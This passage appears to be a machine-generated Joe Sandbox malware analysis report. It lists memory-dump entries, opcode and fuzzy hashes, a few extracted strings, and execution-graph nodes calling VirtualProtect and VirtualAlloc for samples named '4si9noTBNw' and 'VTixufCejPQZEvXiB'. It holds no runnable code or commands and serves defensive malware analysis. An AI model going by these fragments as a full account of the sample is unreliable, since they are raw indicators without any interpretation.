                                                                                                • Opcode ID: 02ba85268388270c085b30af681a0940bec2fe7fcb104e71bb7f212714e5f1d1
                                                                                                • Instruction ID: 1efec157ecb26d101aea94ceea6461794527ba1668f19675451323ddffa93ab5
                                                                                                • Opcode Fuzzy Hash: 02ba85268388270c085b30af681a0940bec2fe7fcb104e71bb7f212714e5f1d1
                                                                                                • Instruction Fuzzy Hash: FE718530618A8D8FDB68DF28D8957F937D1FB59312F14423EE84EC7292CB74A9458B81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6a2b6d195a8d03d74b7210f5451dc572900e2644e0ff4a3622e3a08093855c7f
                                                                                                • Instruction ID: c2826a642cf60bd647bb9da7009ff1126a70f5b80189cac83e3b27c0ec7d3a4d
                                                                                                • Opcode Fuzzy Hash: 6a2b6d195a8d03d74b7210f5451dc572900e2644e0ff4a3622e3a08093855c7f
                                                                                                • Instruction Fuzzy Hash: 35419F12B0DA695FE309B7B874AA5F87B91DF49325B0400FFC05ECB1E7DD28A8428281
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62b81a85e98e4fcea221cea09ff91d3f13aa7af30e844e62f7cb061d07c1ab4e
                                                                                                • Instruction ID: 2aa0bc1e2e30d2882fbedc7211689eaf48cd90ed5a8e04d0748803c9f5db62ab
                                                                                                • Opcode Fuzzy Hash: 62b81a85e98e4fcea221cea09ff91d3f13aa7af30e844e62f7cb061d07c1ab4e
                                                                                                • Instruction Fuzzy Hash: 07414D12B1DA695FE319B7B874AA5F87B91DF49324B0400FFD05EC71E7DD28A8428281
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 366ef1a2a3fc5824295586522a7024d563ab8e33468d5429d3099753ade7382c
                                                                                                • Instruction ID: a53e9d55dca38c4e63f944b27f824f1d8110977ee2d5d4dc2e0811c854b351f4
                                                                                                • Opcode Fuzzy Hash: 366ef1a2a3fc5824295586522a7024d563ab8e33468d5429d3099753ade7382c
                                                                                                • Instruction Fuzzy Hash: 5831F721B1DA691FE358B7B8786A5B977D2DF49325B0400FFD41EC71E7DC28A8418281
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8e07c6b763df4e0f2711a7120aea3087d8955d84cb23e5ad42e2bdb2e9b529fb
                                                                                                • Instruction ID: c2c15329a28366fd2259b12584bd65151f38319b5eb2dcdf148dcf4138eb9049
                                                                                                • Opcode Fuzzy Hash: 8e07c6b763df4e0f2711a7120aea3087d8955d84cb23e5ad42e2bdb2e9b529fb
                                                                                                • Instruction Fuzzy Hash: EF31FA30A0DA4A8FDB56EB74C8649A97BF1FF5E310B0905FAC059C71A2DE386541C740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd8e0baa3740fff66ff363364a1d6b725da1f1293f1d1a0a098e523cbb8efcc7
                                                                                                • Instruction ID: c1df2d0e2bcd684bcbf06d11809609b7ccf8deb9f36729178e0ebdb27e5bb441
                                                                                                • Opcode Fuzzy Hash: dd8e0baa3740fff66ff363364a1d6b725da1f1293f1d1a0a098e523cbb8efcc7
                                                                                                • Instruction Fuzzy Hash: 4431F420B19E5D1FE798F768846AA7A7BD2EF58315B1400BDE40EC72F7DD38A8418281
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ec288fe452075a308799e8618926923c138db70320c6b991da7ff6bf7a74b95c
                                                                                                • Instruction ID: 55a89c2853c2ec3d53b50e70509c4a93600150b4fa32b02a41995c99840a0d1a
                                                                                                • Opcode Fuzzy Hash: ec288fe452075a308799e8618926923c138db70320c6b991da7ff6bf7a74b95c
                                                                                                • Instruction Fuzzy Hash: F3214135F1DA5D8FE722ABB898250DC7B60DF85724F0545F3C058CB1D3D9382A869751
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 563f0b22c3d044ed18b643793d457ebfd6bd2ab87447492000b7ca279dad1163
                                                                                                • Instruction ID: 2bf4e0488b6b47eafe376f9cc647d8b7df82179f9b59ec907397f79a1c5a7371
                                                                                                • Opcode Fuzzy Hash: 563f0b22c3d044ed18b643793d457ebfd6bd2ab87447492000b7ca279dad1163
                                                                                                • Instruction Fuzzy Hash: A9310E31E1895D8FDB64EB54C8647A972A1FB5C324F1501BDD41ED32E1CA396E81CB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 238400861e6bb96cff992512771ff10c255969b126e5c8553c26992fe359df77
                                                                                                • Instruction ID: dfd89235822056c8b69d429db7ad6e2f1b440916286932d9c79c208a29ba7e54
                                                                                                • Opcode Fuzzy Hash: 238400861e6bb96cff992512771ff10c255969b126e5c8553c26992fe359df77
                                                                                                • Instruction Fuzzy Hash: 42110C20B1AD0E8FEBA4EF9488A57B86291EF5C301F5500B9C41ED72B2DE38AA448710
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 665f7e3b0328a40e55430b111ac90f6e926e8792a51fdb39136e9e57ea7783af
                                                                                                • Instruction ID: 26db16c5fa50d79b017cae106418b5f22e7ef867c3ad606ca9b1458e48d68e03
                                                                                                • Opcode Fuzzy Hash: 665f7e3b0328a40e55430b111ac90f6e926e8792a51fdb39136e9e57ea7783af
                                                                                                • Instruction Fuzzy Hash: 6711A535F1EA8D8FE722DFA4886109C7FB1EF56714F0645F7C054DB2A2D9386A458780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction ID: d7254e299d0c61633fd50ebeeaaf2b73b15b763aa472bfd5dc29bfbfdbf89828
                                                                                                • Opcode Fuzzy Hash: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction Fuzzy Hash: 88011E21B1ED0D8BEB64EF9884A967823D2DF98710F1601B9D41AC72B2DD29AA418640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b39d6a24626195700fe8ed6302a6b8b01df6becabbf02b307f685f37f56cca8e
                                                                                                • Instruction ID: 37f4339d33d39cd644b4e054429b46a73f4236abb15be0902c5367a7f2ccc744
                                                                                                • Opcode Fuzzy Hash: b39d6a24626195700fe8ed6302a6b8b01df6becabbf02b307f685f37f56cca8e
                                                                                                • Instruction Fuzzy Hash: 16018031E1EA8D8FE726DFA4886009C7FB1EF56714F1641F7C054DB2A2D9386A458780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7131764b9d236f84a0f87fec85c2f1fb2aa962a93aabee54dfc81182e2b9ef43
                                                                                                • Instruction ID: ab549e4678b7e4c45d7e8f1cb7bdd6f99b81eebfd3eb537bd9fa5e315a024334
                                                                                                • Opcode Fuzzy Hash: 7131764b9d236f84a0f87fec85c2f1fb2aa962a93aabee54dfc81182e2b9ef43
                                                                                                • Instruction Fuzzy Hash: 1E017130E1EA8D9FE726DBA4886409C7FB1EF16714F1541F7C064DB2A2D9386A458740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5acfba0c6562c1a10888a60ca85a97accb6bc6a61a5cee94002c2ef2ec7bf432
                                                                                                • Instruction ID: 151c55b265a01e6ce15db80c3ec4cd1c7d0dd1998e198a8455df0b391c39d4f6
                                                                                                • Opcode Fuzzy Hash: 5acfba0c6562c1a10888a60ca85a97accb6bc6a61a5cee94002c2ef2ec7bf432
                                                                                                • Instruction Fuzzy Hash: FAF0553120D649CFC706AB3CC8958C43B60EB87225B8A10FAC089CB9A2C2281C5FCB00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 8629ccb71356551793cb72b9435150d64bf50a69d22b91340b35a22e1fcecbb4
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 9EF0F434A1AD0E8BEBA4FFC0C8A46B87361EF58311F510179C41AD72B1CE386A85C700
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae500bbb4c841754f7a3da89dba62ce1643f05e4494f5e9b5ba89b9c45e3be6a
                                                                                                • Instruction ID: 00c3183e3ecbafa028da39b53966922bf2f059327c656efd56f26fdad59fe715
                                                                                                • Opcode Fuzzy Hash: ae500bbb4c841754f7a3da89dba62ce1643f05e4494f5e9b5ba89b9c45e3be6a
                                                                                                • Instruction Fuzzy Hash: 43F03A61F2AD2E4BF7B0F79484A53B822D1AF1C710F1A0071D46DE22B1CE3CAE814A42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: 938b93f7eb412964e14054d9f2b4f6d1dd7efd82c935e5241432befb80103025
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 9DF0D020B1AD0D8BEBB0EF84C9A47B93352EF58311F1141B9C91AD72B2DD396E458650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89f7c6c295d178cdf19de25ef777ccdab4bbee6c0f9d830b1345820fd20f75a1
                                                                                                • Instruction ID: b317d4bbbda63b0515e671cc07fe9b168132af5cdce32671af0d157f573d6674
                                                                                                • Opcode Fuzzy Hash: 89f7c6c295d178cdf19de25ef777ccdab4bbee6c0f9d830b1345820fd20f75a1
                                                                                                • Instruction Fuzzy Hash: 45F0B430B19A0ECBE754DFA4C8A56B977E1EB58711F1482BAD019C32E5DD3866848B40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 840cdf2471a1a48cf32cefe2ea524713a4c46192b12f554c2e88aca2b7cad671
                                                                                                • Instruction ID: 21c8b316c0238ebee1c245d99acbf127710beab35ddb3fd1c9b14a7d9663d1e9
                                                                                                • Opcode Fuzzy Hash: 840cdf2471a1a48cf32cefe2ea524713a4c46192b12f554c2e88aca2b7cad671
                                                                                                • Instruction Fuzzy Hash: 30E06D61F2AC1E0BE6F0FB5880A57B822D2AB5C740B020071C02ED22B1CE3C6D814741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 41d01b9cfe46696a43681bb52f9c850f3c8fa1cb72eaeae39a632c6c338e4a46
                                                                                                • Instruction ID: a9f22208ca336b7cba757f9b5b503bf807d2286f0425036eb3f9635939e61683
                                                                                                • Opcode Fuzzy Hash: 41d01b9cfe46696a43681bb52f9c850f3c8fa1cb72eaeae39a632c6c338e4a46
                                                                                                • Instruction Fuzzy Hash: F8E0DF71F29C2A0BE7B0F75884A66B427D1EB1C340F1101B2C828D32A1DE38AD824B81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3df2e20900c570906db27adbae3d6f8ea5aeedfe203fcbe82b4dd121bfe82078
                                                                                                • Instruction ID: 212d94868e6fdefa3572a50cd443aee5e06c3b52bff4f9ea9f74f919bb0b426a
                                                                                                • Opcode Fuzzy Hash: 3df2e20900c570906db27adbae3d6f8ea5aeedfe203fcbe82b4dd121bfe82078
                                                                                                • Instruction Fuzzy Hash: D5C01214B5780A52D02873A9FD664E97780DF4C228BC54071E01D85096DD5A15878196
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f6fd75930d1efeb94d8439de6f17ce87baadd0a69eaea07f9eddc42f85e34070
                                                                                                • Instruction ID: 21cc1f12559d4b8ff44f8c8ceb0d7f4e3b25e9d01c159eaac7b377653f6eb0aa
                                                                                                • Opcode Fuzzy Hash: f6fd75930d1efeb94d8439de6f17ce87baadd0a69eaea07f9eddc42f85e34070
                                                                                                • Instruction Fuzzy Hash: 7FC04C05F6FE5F43F835B3EE98660ACA1405FDDA14FE70172D56C801F29C6E22D5419A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction ID: 117d9e4f7a837945b06f25a181308a6cffb83ffe29f31610afb6623c60c79188
                                                                                                • Opcode Fuzzy Hash: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction Fuzzy Hash: 45C08C30611C0C8FC908EB28C88480433A0FB0D200BC200E0E009C71B0D229ECC0C740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d6da0660a00101ada1d56075835bcfda281a1e86d4fb2957990c9d5af3e0e989
                                                                                                • Instruction ID: a3507932bc91c138a1504ddb05cffebc8308c94cbddcb17b9f05c2fbe9da2456
                                                                                                • Opcode Fuzzy Hash: d6da0660a00101ada1d56075835bcfda281a1e86d4fb2957990c9d5af3e0e989
                                                                                                • Instruction Fuzzy Hash: DBC0EA20F2AD1E9BEAA8B3A484662B951C65F4C704B560474D1AEE32E3DD2DAA404A40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6ef416c16fde88c947d5eb0b613ec7d1272246296cc6fcae4ddc785cef355d4
                                                                                                • Instruction ID: 4429feac776f7b268b6d1f8d7e862dcd6e3f2eb3f870b3245e0d11505dbf13b1
                                                                                                • Opcode Fuzzy Hash: c6ef416c16fde88c947d5eb0b613ec7d1272246296cc6fcae4ddc785cef355d4
                                                                                                • Instruction Fuzzy Hash: B8C04C14F59C2A47E369A214583567E04929B48758F950074E46D976DECE1C6A1212C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction ID: ce67ef7fc0b35975dd430fcfbe058d3c70e3b4322f25a17c9a31355b33c2b72f
                                                                                                • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction Fuzzy Hash: 6DB01200D6BC4F02E42433FB0C5306470405F8C104FC30070D46C801A2985E129402C6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0$F%OB$J$7J
                                                                                                • API String ID: 0-1736064201
                                                                                                • Opcode ID: fbf33ddcd35f2baa1343a7352f752eb6920df28396bba662dca4ae063c50cb76
                                                                                                • Instruction ID: 94fca5096c23ff82bb077145c0014fad57f8763706950f56d561df0d439783db
                                                                                                • Opcode Fuzzy Hash: fbf33ddcd35f2baa1343a7352f752eb6920df28396bba662dca4ae063c50cb76
                                                                                                • Instruction Fuzzy Hash: 8F511C30A1951D8FDB58EF68C8A5ABE77B2FF58304F414079D01AE72A6CF79A941CB40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: F%OB$J$7J
                                                                                                • API String ID: 0-4083579901
                                                                                                • Opcode ID: af226ff24483df4a7a64e47d930d591d564ae4cd98c9e9a4c29bcbe2828a0591
                                                                                                • Instruction ID: 1a5b3c05c11a62a09c149fb7b4ce473cb6d17c94288aaaa50a9504b81643aa1f
                                                                                                • Opcode Fuzzy Hash: af226ff24483df4a7a64e47d930d591d564ae4cd98c9e9a4c29bcbe2828a0591
                                                                                                • Instruction Fuzzy Hash: 6F71B230A0954D8FDB64EF68C8A9AAD77F2FF48300F454479D05ADB2A6DF39A941C780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d956eff10f41fd031491f0c6a27c236860fe977dc4771a18f257c6235c609c67
                                                                                                • Instruction ID: e7da3a9fcc1ee454f0499076cdb2408a74d9c0dbdc180533240abb777c6e0f94
                                                                                                • Opcode Fuzzy Hash: d956eff10f41fd031491f0c6a27c236860fe977dc4771a18f257c6235c609c67
                                                                                                • Instruction Fuzzy Hash: B5028130F1995E4FEBA8FBA884B66BC76D2FF98300F550179E40DD32E6DD28A9418741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fd88e0d16b26e4a3bf11e3395733cb307e5b1749b331db2a2aa619f82eef2bd2
                                                                                                • Instruction ID: b7b5e89deea06494529e39f106165b098ea21b0301d97257004bb3c3a85e4847
                                                                                                • Opcode Fuzzy Hash: fd88e0d16b26e4a3bf11e3395733cb307e5b1749b331db2a2aa619f82eef2bd2
                                                                                                • Instruction Fuzzy Hash: 1F51D175A19E8D8EE758DF688869BAA7FE0FB99318F4001BED019D73D5DBB92411C300
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c9$!k9$"s9$#{9
                                                                                                • API String ID: 0-1692736845
                                                                                                • Opcode ID: 2b950c710da46a23c55ae9b6e35841d207520b35e352756cce17f38ed034cf0d
                                                                                                • Instruction ID: ae86f3615b8cc6b120213aa14eee0183da3e7b1a752d54421baa94c05492ca4a
                                                                                                • Opcode Fuzzy Hash: 2b950c710da46a23c55ae9b6e35841d207520b35e352756cce17f38ed034cf0d
                                                                                                • Instruction Fuzzy Hash: 1E51E087B1943786E31E33FD79299EC5B44DF8423DB0846B3E16E8A0C76C88648792E5

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.1%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:6
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 12311 7ffd9b88b1aa 12312 7ffd9b88b1b9 VirtualProtect 12311->12312 12314 7ffd9b88b29e 12312->12314 12315 7ffd9b88c181 12316 7ffd9b88c18f VirtualAlloc 12315->12316 12318 7ffd9b88c244 12316->12318

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5[_H
                                                                                                • API String ID: 0-3279724263
                                                                                                • Opcode ID: fb024683519779c5f31ede48f31d2c50c5d26dea2771af59c2b19bae4ce11bc9
                                                                                                • Instruction ID: 7fe2f776d3ccc1f5a8d19a47f42d6b3d01bb65841a960180eefa4c2ded3a75d4
                                                                                                • Opcode Fuzzy Hash: fb024683519779c5f31ede48f31d2c50c5d26dea2771af59c2b19bae4ce11bc9
                                                                                                • Instruction Fuzzy Hash: 89912275A19E8D8FE799EF6888697A97FE1FB99310F4401BED059C73E2DAB41804C700

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
